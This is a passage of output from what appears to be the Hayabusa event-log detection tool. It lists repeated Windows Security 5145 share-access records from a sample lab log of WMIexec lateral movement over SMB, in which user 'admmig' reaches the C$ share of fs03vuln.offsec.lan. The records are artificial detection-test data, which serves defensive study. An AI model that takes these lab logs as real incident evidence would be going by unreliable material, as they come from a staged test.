Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 